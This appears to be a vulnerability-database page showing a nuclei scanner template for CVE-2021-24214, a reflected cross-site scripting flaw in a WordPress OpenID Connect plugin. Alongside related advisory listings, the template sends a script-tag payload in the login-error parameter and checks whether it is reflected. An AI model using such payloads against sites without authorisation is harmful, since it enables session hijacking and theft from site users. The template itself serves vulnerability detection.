Lucene search
+L

WordPress OpenID Connect Generic Client 3.8.0-3.8.1 - Cross-Site Scripting

🗓️ 02 Aug 2026 03:00:19Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 65 Views

WordPress OpenID Connect Generic Client 3.8.0-3.8.1 - Cross-Site Scripting vulnerability allows arbitrary script code executio

Related
Refs
Code
ReporterTitlePublishedViews
Family
attackerkb
ATTACKERKB
CVE-2021-24214
6 May 202113:15
attackerkb
cnnvd
CNNVD
WordPress 跨站脚本漏洞
6 May 202100:00
cnnvd
cve
CVE
CVE-2021-24214
5 May 202118:39
cve
cvelist
Cvelist
CVE-2021-24214 OpenID Connect Generic Client 3.8.0-3.8.1 - Reflected Cross Site Scripting (XSS) via Login Error
5 May 202118:39
cvelist
euvd
EUVD
EUVD-2021-11128
7 Oct 202500:30
euvd
nvd
NVD
CVE-2021-24214
6 May 202113:15
nvd
osv
OSV
CVE-2021-24214
6 May 202113:15
osv
patchstack
Patchstack
WordPress OpenID Connect Generic Client plugin <= 3.8.1 - Reflected Cross-Site Scripting (XSS) vulnerability
7 Apr 202100:00
patchstack
prion
Prion
Cross site scripting
6 May 202113:15
prion
redhatcve
RedhatCVE
CVE-2021-24214
22 May 202519:20
redhatcve
Rows per page
id: CVE-2021-24214

info:
  name: WordPress OpenID Connect Generic Client 3.8.0-3.8.1 - Cross-Site Scripting
  author: tess
  severity: medium
  description: WordPress OpenID Connect Generic Client plugin 3.8.0 and 3.8.1 contains a cross-site scripting vulnerability. It does not sanitize the login error when output back in the login form, thereby not requiring authentication, which can be exploited with the default configuration.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Update to the latest version of the WordPress OpenID Connect Generic Client plugin (3.8.2) to fix this vulnerability.
  reference:
    - https://wpscan.com/vulnerability/31cf0dfb-4025-4898-a5f4-fc7115565a10
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24214
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24214
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-24214
    cwe-id: CWE-79
    epss-score: 0.0163
    epss-percentile: 0.73852
    cpe: cpe:2.3:a:daggerhartlab:openid_connect_generic_client:3.8.0:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: daggerhartlab
    product: "openid_connect_generic_client"
    framework: wordpress
  tags: cve2021,cve,wpscan,wordpress,xss,wp-plugin,wp,openid,daggerhartlab,vuln
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/daggerhart-openid-connect-generic/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        internal: true
        words:
          - 'OpenID Connect Generic Client'

  - method: GET
    path:
      - '{{BaseURL}}/wp-login.php?login-error=<script>alert(document.domain)</script>'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'ERROR (<script>alert(document.domain)</script>):'
          - 'Login with OpenID Connect'
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100b68367b8987e1a962b27bc92dfafdfe1c77b0856a54797e23772d4cba2880007022100864347c3acd448c03c047c05b7e4e475f60c8b2db288f243ae3714f84fff545d:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6Medium risk
Vulners AI Score6
CVSS 24.3
CVSS 3.16.1
EPSS0.0163
65